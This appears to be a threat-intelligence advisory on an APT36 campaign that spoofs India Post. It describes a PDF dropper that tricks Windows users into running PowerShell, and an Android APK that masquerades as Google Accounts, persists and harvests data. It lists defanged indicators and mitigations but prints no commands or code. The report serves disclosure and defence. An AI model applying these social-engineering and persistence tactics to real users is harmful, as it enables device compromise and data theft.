Full Report
An advanced persistent threat (APT) group with ties to Pakistan has been attributed to the creation of a fake website masquerading as India's public sector postal system as part of a campaign designed to infect both Windows and Android users in the country. Cybersecurity company CYFIRMA has attributed the campaign with medium confidence to a threat actor called APT36, which is also known as
Analysis Summary
# Threat Actor: APT36
## Attribution & Identity
Attributed with medium confidence to APT36, also known as Transparent Tribe. The threat actor is stated to have ties to Pakistan. The campaign artifacts reference Pakistan's Prime Minister Youth Laptop Scheme (PMYLS).
## Activity Summary
APT36 is conducting a campaign targeting users in India by spoofing the India Post website (`postindia[.]site`). The campaign uses device type (Windows vs. Android) to serve different malicious payloads: a malicious PDF on desktop systems and a malicious APK on mobile devices. The tactic leveraging the PDF dropper is described as a new "ClickFix" technique.
## Tactics, Techniques & Procedures
- **Spearphishing/Impersonation:** Creating a fake website impersonating India Post (`postindia[.]site`).
- **Execution via Social Engineering (Windows):** Delivering a malicious PDF, which instructs the user to execute a PowerShell command via the Run dialog (Win + R).
- **Malicious Document Usage:** Utilizing a PDF that drops and executes a PowerShell command that downloads a next-stage payload.
- **Trojanized Application (Android):** Serving a malicious Android application package (`indiapost.apk`) urging installation for a "better experience."
- **Evasion (Android):** The malicious app changes its icon to mimic a non-suspicious Google Accounts icon to conceal its activity.
- **Persistence (Android):** The app is designed to run continuously in the background, even after a device restart, and actively seeks permissions to ignore battery optimization.
- **Permission Abuse (Android):** Requests extensive permissions to harvest and exfiltrate sensitive data, including contacts, location, and files from external storage.
- **Adversarial Deception:** The malicious app forces users to accept permissions if they are denied initially.
## Targeting
- **Sectors:** Not explicitly stated, but the use of the India Post spoof suggests targeting the general public or individuals involved in postal/package logistics in India.
- **Geography:** India.
- **Victims:** Windows and Android users visiting the spoofed India Post website. The PDF's EXIF data suggests a possible ideological or intelligence link to Pakistan's Prime Minister Youth Laptop Scheme.
## Tools & Infrastructure
- **Malware Families used:** Malicious PDF dropper leading to PowerShell execution; Malicious Android application (APK).
- **Infrastructure (C2, domains, IPs - defang URLs):**
- Impersonated Domain: `postindia[.]site` (Registered November 20, 2024)
- Next-Stage Payload C2 (Currently Inactive): `88.222.245[.]211`
- Artifact Author Mentioned: "PMYLS" (likely Pakistan's Prime Minister Youth Laptop Scheme).
## Implications
APT36 (Transparent Tribe) is actively deploying sophisticated, platform-agnostic (Windows and Android) social engineering campaigns aimed at users in India. The adoption of "ClickFix" tactics using PowerShell execution via the Run dialog combined with stealthy Android malware (icon masquerading, persistence features) indicates an evolving and determined threat actor leveraging current events or broad infrastructure (like postal services) for initial access.
## Mitigations
- **User Awareness:** Educate users, especially regarding unsolicited communications related to package delivery or government schemes (like PMYLS), warning against downloading files from lookalike websites.
- **Windows Defense:** Implement application control or monitoring to restrict unauthorized PowerShell execution via user-initiated Run dialog commands.
- **Endpoint Detection (Android):** Deploy mobile threat defense solutions capable of analyzing application behavior, especially regarding permission escalation, icon modification, and battery optimization bypass attempts.
- **Network Monitoring:** Monitor traffic to and from known malicious infrastructure, even if currently inactive, if identified in future indicators.